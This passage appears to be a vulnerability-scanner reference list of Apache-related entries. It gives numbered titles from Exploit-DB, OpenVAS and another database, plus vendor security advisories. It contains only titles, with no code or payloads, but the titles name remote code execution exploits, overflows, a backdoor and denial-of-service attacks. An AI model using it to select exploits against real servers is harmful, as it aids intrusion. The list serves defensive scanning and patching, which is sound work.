8271| [4931] Apache source.asp example file allows users to write to files
8272| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
8273| [4205] Apache Jakarta Tomcat delivers file contents
8274| [2084] Apache on Debian by default serves the /usr/doc directory
8275| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
8276| [697] Apache HTTP server beck exploit
8277| [331] Apache cookies buffer overflow
8278|
| Exploit-DB - https://www.exploit-db.com:
| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
| [29859] Apache Roller OGNL Injection
| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
| [29290] Apache / PHP 5.x Remote Code Execution Exploit
| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
| [27096] Apache Geronimo 1.0 Error Page XSS
| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
| [25986] Plesk Apache Zeroday Remote Exploit
| [25980] Apache Struts includeParams Remote Code Execution
| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
| [24874] Apache Struts ParametersInterceptor Remote Code Execution
| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [21719] Apache 2.0 Path Disclosure Vulnerability
| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
| [20558] Apache 1.2 Web Server DoS Vulnerability
| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
| [19231] PHP apache_request_headers Function Buffer Overflow
| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
| [18442] Apache httpOnly Cookie Disclosure
| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
| [18221] Apache HTTP Server Denial of Service
| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
| [17691] Apache Struts < 2.2.0 - Remote Command Execution
| [16798] Apache mod_jk 1.2.20 Buffer Overflow
| [16782] Apache Win32 Chunked Encoding
| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
| [15319] Apache 2.2 (Windows) Local Denial of Service
| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
| [12330] Apache OFBiz - Multiple XSS
| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
| [466] htpasswd Apache 1.3.31 - Local Exploit
| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
| [9] Apache HTTP Server 2.x Memory Leak Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
| [900571] Apache APR-Utils Version Detection
| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
| [900496] Apache Tiles Multiple XSS Vulnerability
| [900493] Apache Tiles Version Detection
| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
| [870175] RedHat Update for apache RHSA-2008:0004-01
| [864591] Fedora Update for apache-poi FEDORA-2012-10835
| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
| [864250] Fedora Update for apache-poi FEDORA-2012-7683
| [864249] Fedora Update for apache-poi FEDORA-2012-7686
| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
| [855821] Solaris Update for Apache 1.3 122912-19
| [855812] Solaris Update for Apache 1.3 122911-19
| [855737] Solaris Update for Apache 1.3 122911-17
| [855731] Solaris Update for Apache 1.3 122912-17
| [855695] Solaris Update for Apache 1.3 122911-16
| [855645] Solaris Update for Apache 1.3 122912-16
| [855587] Solaris Update for kernel update and Apache 108529-29
| [855566] Solaris Update for Apache 116973-07
| [855531] Solaris Update for Apache 116974-07
| [855524] Solaris Update for Apache 2 120544-14
| [855494] Solaris Update for Apache 1.3 122911-15
| [855478] Solaris Update for Apache Security 114145-11
| [855472] Solaris Update for Apache Security 113146-12
| [855179] Solaris Update for Apache 1.3 122912-15
| [855147] Solaris Update for kernel update and Apache 108528-29
| [855077] Solaris Update for Apache 2 120543-14
| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
| [850088] SuSE Update for apache2 SUSE-SA:2007:061
| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
| [841209] Ubuntu Update for apache2 USN-1627-1
| [840900] Ubuntu Update for apache2 USN-1368-1
| [840798] Ubuntu Update for apache2 USN-1259-1
| [840734] Ubuntu Update for apache2 USN-1199-1
| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
| [835253] HP-UX Update for Apache Web Server HPSBUX02645
| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
| [835236] HP-UX Update for Apache with PHP HPSBUX02543
| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
| [835188] HP-UX Update for Apache HPSBUX02308
| [835181] HP-UX Update for Apache With PHP HPSBUX02332
| [835180] HP-UX Update for Apache with PHP HPSBUX02342
| [835172] HP-UX Update for Apache HPSBUX02365
| [835168] HP-UX Update for Apache HPSBUX02313
| [835148] HP-UX Update for Apache HPSBUX01064
| [835139] HP-UX Update for Apache with PHP HPSBUX01090
| [835131] HP-UX Update for Apache HPSBUX00256
| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
| [835104] HP-UX Update for Apache HPSBUX00224
| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
| [835101] HP-UX Update for Apache HPSBUX01232
| [835080] HP-UX Update for Apache HPSBUX02273
| [835078] HP-UX Update for ApacheStrong HPSBUX00255
| [835044] HP-UX Update for Apache HPSBUX01019
| [835040] HP-UX Update for Apache PHP HPSBUX00207
| [835025] HP-UX Update for Apache HPSBUX00197
| [835023] HP-UX Update for Apache HPSBUX01022
| [835022] HP-UX Update for Apache HPSBUX02292
| [835005] HP-UX Update for Apache HPSBUX02262
| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [801942] Apache Archiva Multiple Vulnerabilities
| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
| [801284] Apache Derby Information Disclosure Vulnerability
| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
| [800680] Apache APR Version Detection
| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [800677] Apache Roller Version Detection
| [800279] Apache mod_jk Module Version Detection
| [800278] Apache Struts Cross Site Scripting Vulnerability
| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
| [800276] Apache Struts Version Detection
| [800271] Apache Struts Directory Traversal Vulnerability
| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [103122] Apache Web Server ETag Header Information Disclosure Weakness
| [103074] Apache Continuum Cross Site Scripting Vulnerability
| [103073] Apache Continuum Detection
| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [101023] Apache Open For Business Weak Password security check
| [101020] Apache Open For Business HTML injection vulnerability
| [101019] Apache Open For Business service detection
| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
| [100923] Apache Archiva Detection
| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [100813] Apache Axis2 Detection
| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [100795] Apache Derby Detection
| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [100514] Apache Multiple Security Vulnerabilities
| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [72626] Debian Security Advisory DSA 2579-1 (apache2)
| [72612] FreeBSD Ports: apache22
| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
| [71512] FreeBSD Ports: apache
| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
| [71256] Debian Security Advisory DSA 2452-1 (apache2)
| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
| [70737] FreeBSD Ports: apache
| [70724] Debian Security Advisory DSA 2405-1 (apache2)
| [70600] FreeBSD Ports: apache
| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
| [70235] Debian Security Advisory DSA 2298-2 (apache2)
| [70233] Debian Security Advisory DSA 2298-1 (apache2)
| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
| [69338] Debian Security Advisory DSA 2202-1 (apache2)
| [67868] FreeBSD Ports: apache
| [66816] FreeBSD Ports: apache
| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
| [66081] SLES11: Security update for Apache 2
| [66074] SLES10: Security update for Apache 2
| [66070] SLES9: Security update for Apache 2
| [65998] SLES10: Security update for apache2-mod_python
| [65893] SLES10: Security update for Apache 2
| [65888] SLES10: Security update for Apache 2
| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
| [65510] SLES9: Security update for Apache 2
| [65472] SLES9: Security update for Apache
| [65467] SLES9: Security update for Apache
| [65450] SLES9: Security update for apache2
| [65390] SLES9: Security update for Apache2
| [65363] SLES9: Security update for Apache2
| [65309] SLES9: Security update for Apache and mod_ssl
| [65296] SLES9: Security update for webdav apache module
| [65283] SLES9: Security update for Apache2
| [65249] SLES9: Security update for Apache 2
| [65230] SLES9: Security update for Apache 2
| [65228] SLES9: Security update for Apache 2
| [65212] SLES9: Security update for apache2-mod_python
| [65209] SLES9: Security update for apache2-worker
| [65207] SLES9: Security update for Apache 2
| [65168] SLES9: Security update for apache2-mod_python
| [65142] SLES9: Security update for Apache2
| [65136] SLES9: Security update for Apache 2
| [65132] SLES9: Security update for apache
| [65131] SLES9: Security update for Apache 2 oes/CORE
| [65113] SLES9: Security update for apache2
| [65072] SLES9: Security update for apache and mod_ssl
| [65017] SLES9: Security update for Apache 2
| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
| [64783] FreeBSD Ports: apache
| [64774] Ubuntu USN-802-2 (apache2)
| [64653] Ubuntu USN-813-2 (apache2)
| [64559] Debian Security Advisory DSA 1834-2 (apache2)
| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
| [64443] Ubuntu USN-802-1 (apache2)
| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
| [64423] Debian Security Advisory DSA 1834-1 (apache2)
| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
| [64251] Debian Security Advisory DSA 1816-1 (apache2)
| [64201] Ubuntu USN-787-1 (apache2)
| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
| [63565] FreeBSD Ports: apache
| [63562] Ubuntu USN-731-1 (apache2)
| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
| [61185] FreeBSD Ports: apache
| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
| [60387] Slackware Advisory SSA:2008-045-02 apache
| [58826] FreeBSD Ports: apache-tomcat
| [58825] FreeBSD Ports: apache-tomcat
| [58804] FreeBSD Ports: apache
| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
| [57335] Debian Security Advisory DSA 1167-1 (apache)
| [57201] Debian Security Advisory DSA 1131-1 (apache)
| [57200] Debian Security Advisory DSA 1132-1 (apache2)
| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
| [57145] FreeBSD Ports: apache
| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
| [56067] FreeBSD Ports: apache
| [55803] Slackware Advisory SSA:2005-310-04 apache
| [55519] Debian Security Advisory DSA 839-1 (apachetop)
| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
| [55355] FreeBSD Ports: apache
| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
| [55261] Debian Security Advisory DSA 805-1 (apache2)
| [55259] Debian Security Advisory DSA 803-1 (apache)
| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
| [54439] FreeBSD Ports: apache
| [53931] Slackware Advisory SSA:2004-133-01 apache
| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
| [53878] Slackware Advisory SSA:2003-308-01 apache security update
| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
| [53848] Debian Security Advisory DSA 131-1 (apache)
| [53784] Debian Security Advisory DSA 021-1 (apache)
| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
| [53735] Debian Security Advisory DSA 187-1 (apache)
| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
| [53282] Debian Security Advisory DSA 594-1 (apache)
| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
| [53215] Debian Security Advisory DSA 525-1 (apache)
| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
| [52529] FreeBSD Ports: apache+ssl
| [52501] FreeBSD Ports: apache
| [52461] FreeBSD Ports: apache
| [52390] FreeBSD Ports: apache
| [52389] FreeBSD Ports: apache
| [52388] FreeBSD Ports: apache
| [52383] FreeBSD Ports: apache
| [52339] FreeBSD Ports: apache+mod_ssl
| [52331] FreeBSD Ports: apache
| [52329] FreeBSD Ports: ru-apache+mod_ssl
| [52314] FreeBSD Ports: apache
| [52310] FreeBSD Ports: apache
| [15588] Detect Apache HTTPS
| [15555] Apache mod_proxy content-length buffer overflow
| [15554] Apache mod_include priviledge escalation
| [14771] Apache <= 1.3.33 htpasswd local overflow
| [14177] Apache mod_access rule bypass
| [13644] Apache mod_rootme Backdoor
| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
| [12280] Apache Connection Blocking Denial of Service
| [12239] Apache Error Log Escape Sequence Injection
| [12123] Apache Tomcat source.jsp malformed request information disclosure
| [12085] Apache Tomcat servlet/JSP container default files
